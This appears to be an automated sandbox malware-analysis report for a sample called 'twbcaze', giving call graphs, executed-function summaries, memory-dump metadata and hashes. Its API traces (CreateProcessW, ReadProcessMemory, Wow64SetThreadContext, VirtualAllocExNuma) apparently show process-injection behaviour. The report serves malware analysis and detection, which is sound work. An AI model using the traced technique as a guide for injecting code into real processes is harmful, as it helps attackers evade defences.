18746->18744 18747 424896 18746->18747 18750 420b84 ___scrt_uninitialize_crt 27 API calls 18746->18750 18747->18744 18748 420b84 ___scrt_uninitialize_crt 27 API calls 18747->18748 18751 4248a2 CloseHandle 18748->18751 18753 42488d 18750->18753 18751->18744 18755 4248ae GetLastError 18751->18755 18752 4248de 18752->18738 18754 420b84 ___scrt_uninitialize_crt 27 API calls 18753->18754 18754->18747 18755->18744 18774 420df0 LeaveCriticalSection 18757->18774 18759 424953 18759->18728 18761 420c64 18760->18761 18762 420bfd 18760->18762 18763 415317 __dosmaperr 14 API calls 18761->18763 18762->18761 18767 420c27 18762->18767 18764 420c69 18763->18764 18765 41532a __dosmaperr 14 API calls 18764->18765 18766 420c54 18765->18766 18766->18752 18769 41533d 18766->18769 18767->18766 18768 420c4e SetStdHandle 18767->18768 18768->18766 18770 41532a __dosmaperr 14 API calls 18769->18770 18771 415348 __dosmaperr 18770->18771 18772 415317 __dosmaperr 14 API calls 18771->18772 18773 41535b 18772->18773 18773->18752 18774->18759 18775->18714 18776->18694 17366 41ae22 17374 41b6a2 17366->17374 17368 41ae36 17370 41afbf __dosmaperr 14 API calls 17371 41ae3e 17370->17371 17372 41ae4b 17371->17372 17379 41ae4e 17371->17379 17375 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17374->17375 17376 41b6be 17375->17376 17377 41b6d6 TlsAlloc 17376->17377 17378 41ae2c 17376->17378 17377->17378 17378->17368 17378->17370 17380 41ae58 17379->17380 17382 41ae5e 17379->17382 17383 41b6e1 17380->17383 17382->17368 17384 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17383->17384 17385 41b6fd 17384->17385 17386 41b706 17385->17386 17387 41b718 TlsFree 17385->17387 17386->17382 17539 41003e 17544 40f6fd SetUnhandledExceptionFilter 17539->17544 17541 410043 17545 415afa 17541->17545 17543 41004e 17544->17541 17546 415b20 17545->17546 17547 415b06 17545->17547 17546->17543 17547->17546 17548 415317 __dosmaperr 14 API calls 17547->17548 17549 415b10 17548->17549 17550 415685 ___std_exception_copy 27 API calls 17549->17550 17551 415b1b 17550->17551 17551->17543 17516 40f8c7 InitializeCriticalSectionEx 17517 40e0c8 17520 40e0cd 17517->17520 17519 40e0e7 17520->17519 17521 413483 std::_Facet_Register 2 API calls 17520->17521 17522 40e0e9 17520->17522 17529 415ddc 17520->17529 17521->17520 17523 40f479 std::_Facet_Register 17522->17523 17525 40e0f3 Concurrency::cancel_current_task 17522->17525 17524 410337 CallUnexpected RaiseException 17523->17524 17526 40f495 17524->17526 17536 410337 17525->17536 17528 40e9fd 17535 41aca1 __Getctype 17529->17535 17530 41acdf 17531 415317 __dosmaperr 14 API calls 17530->17531 17533 41acdd 17531->17533 17532 41acca RtlAllocateHeap 17532->17533 17532->17535 17533->17520 17534 413483 std::_Facet_Register 2 API calls 17534->17535 17535->17530 17535->17532 17535->17534 17537 41037e RaiseException 17536->17537 17538 410351 17536->17538 17537->17528 17538->17537 17388 2308b7 17400 23005f GetPEB 17388->17400 17390 230919 17401 230838 17390->17401 17392 230921 17393 2309b4 17392->17393 17394 2309d0 CreateFileW 17392->17394 17394->17393 17395 2309fa VirtualAlloc ReadFile 17394->17395 17395->17393 17398 230a27 17395->17398 17396 230a40 17398->17396 17399 230d92 ExitProcess 17398->17399 17414 23020a 17398->17414 17400->17390 17428 23005f GetPEB 17401->17428 17403 23084c 17429 23005f GetPEB 17403->17429 17405 23085f 17430 23005f GetPEB 17405->17430 17407 230872 17431 2307da 17407->17431 17409 230880 17410 23089c VirtualAllocExNuma 17409->17410 17411 2308a9 17410->17411 17436 23073a 17411->17436 17443 23005f GetPEB 17414->17443 17416 2303b3 17416->17398 17417 2303c1 CreateProcessW 17419 2303eb 17417->17419 17427 230218 17417->17427 17418 230410 ReadProcessMemory 17418->17419 17418->17427 17419->17416 17471 23114c 17419->17471 17422 23114c 11 API calls 17422->17427 17423 2312fb 11 API calls 17423->17427 17425 230675 Wow64SetThreadContext 17425->17419 17425->17427 17427->17416 17427->17417 17427->17418 17427->17419 17427->17422 17427->17423 17427->17425 17444 2311e1 17427->17444 17453 230f9a 17427->17453 17462 23109b 17427->17462 17428->17403 17429->17405 17430->17407 17441 23005f GetPEB 17431->17441 17433 2307ea 17434 2307f0 GetSystemInfo 17433->17434 17435 23081b 17434->17435 17435->17409 17442 23005f GetPEB 17436->17442 17438 230746 17439 230766 VirtualAlloc 17438->17439 17440 230783 17439->17440 17440->17392 17441->17433 17442->17438 17443->17427 17445 2311fc 17444->17445 17480 23013e GetPEB 17445->17480 17447 23121d 17448 2312d5 17447->17448 17449 231225 17447->17449 17497 231627 17448->17497 17482 230d9b 17449->17482 17452 2312bc 17452->17427 17454 230fb5 17453->17454 17455 23013e GetPEB 17454->17455 17456 230fd6 17455->17456 17457 231068 17456->17457 17458 230fde 17456->17458 17507 23164b 17457->17507 17459 230d9b 10 API calls 17458->17459 17461 23104f 17459->17461 17461->17427 17463 2310b6 17462->17463 17464 23013e GetPEB 17463->17464 17465 2310d7 17464->17465 17466 231121 17465->17466 17467 2310db 17465->17467 17510 23165d 17466->17510 17468 230d9b 10 API calls 17467->17468 17470 231116 17468->17470 17470->17427 17472 23115f 17471->17472 17473 23013e GetPEB 17472->17473 17474 231180 17473->17474 17475 231184 17474->17475 17476 2311ca 17474->17476 17477 230d9b 10 API calls 17475->17477 17513 231615 17476->17513 17479 2311bf 17477->17479 17479->17416 17481 230160 17480->17481 17481->17447 17500 23005f GetPEB 17482->17500 17484 230de4 17501 230109 GetPEB 17484->17501 17487 230e71 17488 230e82 VirtualAlloc 17487->17488 17493 230f46 17487->17493 17489 230e98 ReadFile 17488->17489 17488->17493 17490 230ead VirtualAlloc 17489->17490 17489->17493 17490->17493 17494 230ece 17490->17494 17491 230f84 VirtualFree 17492 230f8f 17491->17492 17492->17452 17493->17491 17493->17492 17494->17493 17495 230f35 CloseHandle 17494->17495 17496 230f39 VirtualFree 17494->17496 17495->17496 17496->17493 17498 230d9b 10 API calls 17497->17498 17499 231631 17498->17499 17499->17452 17500->17484 17503 23011c 17501->17503 17504 230131 CreateFileW 17503->17504 17505 23017b GetPEB 17503->17505 17504->17487 17504->17493 17506 23019f 17505->17506 17506->17503 17508 230d9b 10 API calls 17507->17508 17509 231655 17508->17509 17509->17461 17511 230d9b 10 API calls 17510->17511 17512 231667 17511->17512 17512->17470 17514 230d9b 10 API calls 17513->17514 17515 23161f 17514->17515 17515->17479 20602 42258e 20605 41c5a2 20602->20605 20606 41c5dd 20605->20606 20607 41c5ab 20605->20607 20608 41c5ce 20607->20608 20609 41af25 48 API calls 20607->20609 20610 41c953 58 API calls 20608->20610 20609->20608 20610->20606 17015 40e492 17016 40e4a2 17015->17016 17017 40e4ba 17015->17017 17016->17017 17019 40f8c8 InitializeCriticalSectionEx 17016->17019 17019->17016 17020 41c5a3 17025 41af25 17020->17025 17024 41c5dd 17026 41af30 17025->17026 17027 41af36 17025->17027 17028 41b720 __Getctype 6 API calls 17026->17028 17029 41b75f __Getctype 6 API calls 17027->17029 17031 41af3c 17027->17031 17028->17027 17030 41af50 17029->17030 17030->17031 17033 41bd43 __Getctype 14 API calls 17030->17033 17032 415b88 CallUnexpected 48 API calls 17031->17032 17038 41afb5 17031->17038 17034 41afbe 17032->17034 17035 41af60 17033->17035 17036 41af68 17035->17036 17037 41af7d 17035->17037 17040 41b75f __Getctype 6 API calls 17036->17040 17039 41b75f __Getctype 6 API calls 17037->17039 17050 41c953 17038->17050 17041 41af89 17039->17041 17047 41af74 17040->17047 17042 41af8d 17041->17042 17043 41af9c 17041->17043 17045 41b75f __Getctype 6 API calls 17042->17045 17046 41b0e0 __Getctype 14 API calls 17043->17046 17044 41ac67 _free 14 API calls 17044->17031 17045->17047 17048 41afa7 17046->17048 17047->17044 17049 41ac67 _free 14 API calls 17048->17049 17049->17031 17051 41c966 17050->17051 17068 41c7dd 17051->17068 17054 41c97f 17054->17024 17057 41c9c2 17059 41ac67 _free 14 API calls 17057->17059 17061 41c9d0 17059->17061 17061->17024 17062 41c9bd 17063 415317 __dosmaperr 14 API calls 17062->17063 17063->17057 17064 41ca04 17064->17057 17093 41cca8 17064->17093 17065 41c9d8 17065->17064 17066 41ac67 _free 14 API calls 17065->17066 17066->17064 17101 4129fa 17068->17101 17071 41c810 17073 41c815 GetACP 17071->17073 17074 41c827 17071->17074 17072 41c7fe GetOEMCP 17072->17074 17073->17074 17074->17054 17075 41aca1 17074->17075 17076 41acdf 17075->17076 17080 41acaf __Getctype 17075->17080 17077 415317 __dosmaperr 14 API calls 17076->17077 17079 41acdd 17077->17079 17078 41acca RtlAllocateHeap 17078->17079 17078->17080 17079->17057 17082 41c5ea 17079->17082 17080->17076 17080->17078 17081 413483 std::_Facet_Register 2 API calls 17080->17081 17081->17080 17083 41c7dd 50 API calls 17082->17083 17084 41c60a 17083->17084 17086 41c644 IsValidCodePage 17084->17086 17090 41c680 std::bad_exception::bad_exception 17084->17090 17085 40f907 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17087 41c7db 17085->17087 17088 41c656 17086->17088 17086->17090 17087->17062 17087->17065 17089 41c685 GetCPInfo 17088->17089 17092 41c65f std::bad_exception::bad_exception 17088->17092 17089->17090 17089->17092 17090->17085 17256 41cb28 17092->17256 17094 41ccb4 ___scrt_is_nonwritable_in_current_image 17093->17094 17340 415904 EnterCriticalSection 17094->17340 17096 41ccbe 17341 41ca67 17096->17341 17102 412a11 17101->17102 17103 412a1a 17101->17103 17102->17071 17102->17072 17103->17102 17104 41ae68 __Getctype 48 API calls 17103->17104 17105 412a3a 17104->17105 17109 41b3b2 17105->17109 17110 41b3c5 17109->17110 17111 412a50 17109->17111 17110->17111 17117 41ee0b 17110->17117 17113 41b3df 17111->17113 17114 41b3f2 17113->17114 17115 41b407 17113->17115 17114->17115 17253 41c58f 17114->17253 17115->17102 17118 41ee17 ___scrt_is_nonwritable_in_current_image 17117->17118 17119 41ae68 __Getctype 48 API calls 17118->17119 17120 41ee20 17119->17120 17121 41ee66 17120->17121 17130 415904 EnterCriticalSection 17120->17130 17121->17111 17123 41ee3e 17131 41ee8c 17123->17131 17128 415b88 CallUnexpected 48 API calls 17129 41ee8b 17128->17129 17130->17123 17132 41ee9a __Getctype 17131->17132 17134 41ee4f 17131->17134 17132->17134 17138 41ec40 17132->17138 17135 41ee6b 17134->17135 17252 41591b LeaveCriticalSection 17135->17252 17137 41ee62 17137->17121 17137->17128 17139 41ecc0 17138->17139 17142 41ec56 17138->17142 17141 41ac67 _free 14 API calls 17139->17141 17164 41ed0e 17139->17164 17143 41ece2 17141->17143 17142->17139 17144 41ec89 17142->17144 17146 41ac67 _free 14 API calls 17142->17146 17145 41ac67 _free 14 API calls 17143->17145 17152 41ac67 _free 14 API calls 17144->17152 17165 41ecab 17144->17165 17147 41ecf5 17145->17147 17150 41ec7e 17146->17150 17151 41ac67 _free 14 API calls 17147->17151 17148 41ac67 _free 14 API calls 17153 41ecb5 17148->17153 17149 41ed1c 17154 41ed7c 17149->17154 17163 41ac67 14 API calls _free 17149->17163 17166 41e09c 17150->17166 17157 41ed03 17151->17157 17158 41eca0 17152->17158 17159 41ac67 _free 14 API calls 17153->17159 17155 41ac67 _free 14 API calls 17154->17155 17160 41ed82 17155->17160 17161 41ac67 _free 14 API calls 17157->17161 17194 41e3a8 17158->17194 17159->17139 17160->17134 17161->17164 17163->17149 17206 41edda 17164->17206 17165->17148 17167 41e196 17166->17167 17168 41e0ad 17166->17168 17167->17144 17169 41e0be 17168->17169 17170 41ac67 _free 14 API calls 17168->17170 17171 41e0d0 17169->17171 17172 41ac67 _free 14 API calls 17169->17172 17170->17169 17173 41e0e2 17171->17173 17174 41ac67 _free 14 API calls 17171->17174 17172->17171 17175 41e0f4 17173->17175 17176 41ac67 _free 14 API calls 17173->17176 17174->17173 17177 41e106 17175->17177 17178 41ac67 _free 14 API calls 17175->17178 17176->17175 17179 41e118 17177->17179 17180 41ac67 _free 14 API calls 17177->17180 17178->17177 17181 41e12a 17179->17181 17182 41ac67 _free 14 API calls 17179->17182 17180->17179 17183 41e13c 17181->17183 17184 41ac67 _free 14 API calls 17181->17184 17182->17181 17185 41e14e 17183->17185 17186 41ac67 _free 14 API calls 17183->17186 17184->17183 17187 41e160 17185->17187 17188 41ac67 _free 14 API calls 17185->17188 17186->17185 17189 41e172 17187->17189 17190 41ac67 _free 14 API calls 17187->17190 17188->17187 17191 41e184 17189->17191 17192 41ac67 _free 14 API calls 17189->17192 17190->17189 17191->17167 17193 41ac67 _free 14 API calls 17191->17193 17192->17191 17193->17167 17195 41e3b5 17194->17195 17205 41e40d 17194->17205 17196 41e3c5 17195->17196 17197 41ac67 _free 14 API calls 17195->17197 17198 41e3d7 17196->17198 17199 41ac67 _free 14 API calls 17196->17199 17197->17196 17200 41e3e9 17198->17200 17201 41ac67 _free 14 API calls 17198->17201 17199->17198 17202 41ac67 _free 14 API calls 17200->17202 17204 41e3fb 17200->17204 17201->17200 17202->17204 17203 41ac67 _free 14 API calls 17203->17205 17204->17203 17204->17205 17205->17165 17207 41ee06 17206->17207 17208 41ede7 17206->17208 17207->17149 17208->17207 17212 41e48c 17208->17212 17211 41ac67 _free 14 API calls 17211->17207 17213 41e56a 17212->17213 17214 41e49d 17212->17214 17213->17211 17248 41e7ec 17214->17248 17217 41e7ec __Getctype 14 API calls 17218 41e4b0 17217->17218 17219 41e7ec __Getctype 14 API calls 17218->17219 17220 41e4bb 17219->17220 17221 41e7ec __Getctype 14 API calls 17220->17221 17222 41e4c6 17221->17222 17223 41e7ec __Getctype 14 API calls 17222->17223 17224 41e4d4 17223->17224 17225 41ac67 _free 14 API calls 17224->17225 17226 41e4df 17225->17226 17227 41ac67 _free 14 API calls 17226->17227 17228 41e4ea 17227->17228 17229 41ac67 _free 14 API calls 17228->17229 17230 41e4f5 17229->17230 17231 41e7ec __Getctype 14 API calls 17230->17231 17232 41e503 17231->17232 17233 41e7ec __Getctype 14 API calls 17232->17233 17234 41e511 17233->17234 17235 41e7ec __Getctype 14 API calls 17234->17235 17236 41e522 17235->17236 17237 41e7ec __Getctype 14 API calls 17236->17237 17238 41e530 17237->17238 17239 41e7ec __Getctype 14 API calls 17238->17239 17240 41e53e 17239->17240 17241 41ac67 _free 14 API calls 17240->17241 17242 41e549 17241->17242 17243 41ac67 _free 14 API calls 17242->17243 17244 41e554 17243->17244 17245 41ac67 _free 14 API calls 17244->17245 17246 41e55f 17245->17246 17247 41ac67 _free 14 API calls 17246->17247 17247->17213 17249 41e4a5 17248->17249 17250 41e80f 17248->17250 17249->17217 17250->17249 17251 41ac67 _free 14 API calls 17250->17251 17251->17250 17252->17137 17254 41ae68 __Getctype 48 API calls 17253->17254 17255 41c599 17254->17255 17255->17115 17257 41cb50 GetCPInfo 17256->17257 17258 41cc19 17256->17258 17257->17258 17264 41cb68 17257->17264 17259 40f907 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17258->17259 17260 41cca6 17259->17260 17260->17090 17267 41c02f 17264->17267 17266 41c132 52 API calls 17266->17258 17268 4129fa __fassign 48 API calls 17267->17268 17269 41c04f 17268->17269 17287 41acef 17269->17287 17271 41c10d 17273 40f907 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17271->17273 17272 41c07c 17272->17271 17274 41aca1 std::_Locinfo::_Locinfo_dtor 15 API calls 17272->17274 17278 41c0a2 __alloca_probe_16 std::bad_exception::bad_exception 17272->17278 17275 41c130 17273->17275 17274->17278 17282 41c132 17275->17282 17276 41c107 17290 40fa74 17276->17290 17278->17276 17279 41acef __fassign MultiByteToWideChar 17278->17279 17280 41c0f0 17279->17280 17280->17276 17281 41c0f7 GetStringTypeW 17280->17281 17281->17276 17283 4129fa __fassign 48 API calls 17282->17283 17284 41c145 17283->17284 17294 41c17b 17284->17294 17288 41ad00 MultiByteToWideChar 17287->17288 17288->17272 17291 40fa8f 17290->17291 17292 40fa7e 17290->17292 17291->17271 17292->17291 17293 415be6 ___std_exception_destroy 14 API calls 17292->17293 17293->17291 17295 41c196 17294->17295 17296 41acef __fassign MultiByteToWideChar 17295->17296 17300 41c1da 17296->17300 17297 41c33f 17298 40f907 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17297->17298 17299 41c166 17298->17299 17299->17266 17300->17297 17301 41aca1 std::_Locinfo::_Locinfo_dtor 15 API calls 17300->17301 17304 41c1ff __alloca_probe_16 17300->17304 17301->17304 17302 41acef __fassign MultiByteToWideChar 17305 41c245 17302->17305 17303 40fa74 __freea 14 API calls 17303->17297 17304->17302 17316 41c2a4 17304->17316 17305->17316 17322 41b89f 17305->17322 17308 41c2b3 17310 41c2c5 __alloca_probe_16 17308->17310 17313 41aca1 std::_Locinfo::_Locinfo_dtor 15 API calls 17308->17313 17309 41c27b 17311 41b89f std::_Locinfo::_Locinfo_dtor 6 API calls 17309->17311 17309->17316 17312 41c330 17310->17312 17314 41b89f std::_Locinfo::_Locinfo_dtor 6 API calls 17310->17314 17311->17316 17315 40fa74 __freea 14 API calls 17312->17315 17313->17310 17317 41c30d 17314->17317 17315->17316 17316->17303 17317->17312 17328 41ad6b 17317->17328 17319 41c327 17319->17312 17320 41c35c 17319->17320 17321 40fa74 __freea 14 API calls 17320->17321 17321->17316 17331 41bc08 17322->17331 17326 41b8b0 17326->17308 17326->17309 17326->17316 17327 41b8f0 LCMapStringW 17327->17326 17329 41ad82 WideCharToMultiByte 17328->17329 17329->17319 17332 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17331->17332 17333 41b8aa 17332->17333 17333->17326 17334 41b93b 17333->17334 17337 41bc3c 17334->17337 17336 41b946 std::_Locinfo::_Locinfo_dtor 17336->17327 17338 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17337->17338 17339 41bc52 17338->17339 17339->17336 17340->17096 17351 4161dd 17341->17351 17343 41ca89 17344 4161dd 27 API calls 17343->17344 17345 41caa8 17344->17345 17346 41cacf 17345->17346 17347 41ac67 _free 14 API calls 17345->17347 17348 41cce9 17346->17348 17347->17346 17365 41591b LeaveCriticalSection 17348->17365 17350 41ccd7 17350->17057 17352 4161ee 17351->17352 17356 4161ea _Yarn 17351->17356 17353 4161f5 17352->17353 17357 416208 std::bad_exception::bad_exception 17352->17357 17354 415317 __dosmaperr 14 API calls 17353->17354 17355 4161fa 17354->17355 17358 415685 ___std_exception_copy 27 API calls 17355->17358 17356->17343 17357->17356 17359 416236 17357->17359 17360 41623f 17357->17360 17358->17356 17361 415317 __dosmaperr 14 API calls 17359->17361 17360->17356 17363 415317 __dosmaperr 14 API calls 17360->17363 17362 41623b 17361->17362 17364 415685 ___std_exception_copy 27 API calls 17362->17364 17363->17362 17364->17356 17365->17350

                                          Executed Functions

                                          Function 002308B7 Relevance: 6.4, APIs: 4, Instructions: 384COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 276 2308b7-2309b2 call 23005f call 230838 call 230073 * 8 298 2309b4 276->298 299 2309b9-2309c9 276->299 300 230d97-230d9a 298->300 302 2309d0-2309f3 CreateFileW 299->302 303 2309cb 299->303 304 2309f5 302->304 305 2309fa-230a20 VirtualAlloc ReadFile 302->305 303->300 304->300 306 230a22 305->306 307 230a27-230a3a 305->307 306->300 309 230d81-230d90 call 23020a 307->309 310 230a40-230d7c 307->310 313 230d92-230d94 ExitProcess 309->313
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocNumaVirtual
                                          • String ID:
                                          • API String ID: 4233825816-0
                                          • Opcode ID: 55b22853a2993f0f21eb55e3da2865d1a426949fd4ee5c463d8c609a0ba9bc2d
                                          • Instruction ID: f187909bbc79679f48694e0bea92c0baf5220c3965621e78375268fd15ab93a8
                                          • Opcode Fuzzy Hash: 55b22853a2993f0f21eb55e3da2865d1a426949fd4ee5c463d8c609a0ba9bc2d
                                          • Instruction Fuzzy Hash: 51027460C5D2D9ADDF02CBE984557FDBFB09F2A201F1841C6E4E0B6283D13A935ADB25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401000 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 84memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 346 401000-40104b call 4011d0 call 40e12e 351 401051-40105f 346->351 352 401064-40108d call 401200 346->352 353 4011aa-4011b9 call 401440 351->353 357 401094-40109b 352->357 359 4010a1-4010f6 357->359 360 4010fb-401140 VirtualAlloc call 412320 357->360 359->357 362 401145 360->362 362->353
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: @$tvxyldblemyhw
                                          • API String ID: 4275171209-460681131
                                          • Opcode ID: 3e177a7d2e86f58c96a6a4f8a45f5d4baddb77432dfb2f077bb93cd8b45913c4
                                          • Instruction ID: 7aaee2c2e6d78501d51bf851492d869c5d4d5b2f8c63b9516c1bd50cccf5b8dc
                                          • Opcode Fuzzy Hash: 3e177a7d2e86f58c96a6a4f8a45f5d4baddb77432dfb2f077bb93cd8b45913c4
                                          • Instruction Fuzzy Hash: 184118B0904249DFCB04DFA8D5947DEBBF0BF08304F10856EE485A7391D7799A44CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002307DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemInfo.KERNELBASE(?), ref: 002307F7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoSystem
                                          • String ID:
                                          • API String ID: 31276548-0
                                          • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                          • Instruction ID: af7d0608da51ce6d4509d552f66ad5cd5b73064335690ee9c4de80ea450483bd
                                          • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                          • Instruction Fuzzy Hash: 60F037B1D3410CABDB4CEAB898A56BE77ACDB08310F104569E616E2541D534895146B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F6FD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0040F702
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 9079a48e8e71482e53dfc76507f2ae7f877e7dbde2288b42057c16e9fce70750
                                          • Instruction ID: 431cc7d4a295281fc9bf47c0b96cf208d655127df510026a83839a9efed663c3
                                          • Opcode Fuzzy Hash: 9079a48e8e71482e53dfc76507f2ae7f877e7dbde2288b42057c16e9fce70750
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00230D9B Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 230d9b-230e6b call 23005f call 230073 * 7 call 230109 CreateFileW 19 230e71-230e7c 0->19 20 230f4a 0->20 19->20 25 230e82-230e92 VirtualAlloc 19->25 21 230f4c-230f51 20->21 23 230f53 21->23 24 230f57-230f5c 21->24 23->24 28 230f78-230f7b 24->28 25->20 26 230e98-230ea7 ReadFile 25->26 26->20 29 230ead-230ecc VirtualAlloc 26->29 30 230f5e-230f62 28->30 31 230f7d-230f82 28->31 32 230f46-230f48 29->32 33 230ece-230ee1 call 2300da 29->33 34 230f64-230f6c 30->34 35 230f6e-230f70 30->35 36 230f84-230f8c VirtualFree 31->36 37 230f8f-230f97 31->37 32->21 42 230ee3-230eee 33->42 43 230f1c-230f2c call 230073 33->43 34->28 39 230f72-230f75 35->39 40 230f77 35->40 36->37 39->28 40->28 45 230ef1-230f1a call 2300da 42->45 43->21 49 230f2e-230f33 43->49 45->43 50 230f35-230f36 CloseHandle 49->50 51 230f39-230f44 VirtualFree 49->51 50->51 51->28
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00231631,7FAB7E30), ref: 00230E61
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040), ref: 00230E8B
                                          • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000), ref: 00230EA2
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040), ref: 00230EC4
                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040,?,00000000,0000000E), ref: 00230F36
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040,?), ref: 00230F41
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040,?), ref: 00230F8C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                          • String ID:
                                          • API String ID: 721982790-0
                                          • Opcode ID: f3911bdf1ce60f35c7dd64004a57844e1e55d6d21ab9d20bfbecd889ee39f939
                                          • Instruction ID: 5085f06a7aa812ef2fb5b9cfaf979f7f7a33de9d3476188ec746f567d782b063
                                          • Opcode Fuzzy Hash: f3911bdf1ce60f35c7dd64004a57844e1e55d6d21ab9d20bfbecd889ee39f939
                                          • Instruction Fuzzy Hash: 715180B1E20319BBDB209FB4DC95BAEB7B8AF08710F104555F945F7280DB7499118B78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041B9EE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 52 41b9ee-41b9fa 53 41baa1-41baa4 52->53 54 41baaa 53->54 55 41b9ff-41ba10 53->55 58 41baac-41bab0 54->58 56 41ba12-41ba15 55->56 57 41ba1d-41ba36 LoadLibraryExW 55->57 59 41ba1b 56->59 60 41ba9e 56->60 61 41ba88-41ba91 57->61 62 41ba38-41ba41 GetLastError 57->62 64 41ba9a-41ba9c 59->64 60->53 63 41ba93-41ba94 FreeLibrary 61->63 61->64 65 41ba43-41ba55 call 41eaba 62->65 66 41ba78 62->66 63->64 64->60 68 41bab1-41bab3 64->68 65->66 72 41ba57-41ba69 call 41eaba 65->72 67 41ba7a-41ba7c 66->67 67->61 71 41ba7e-41ba86 67->71 68->58 71->60 72->66 75 41ba6b-41ba76 LoadLibraryExW 72->75 75->67
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
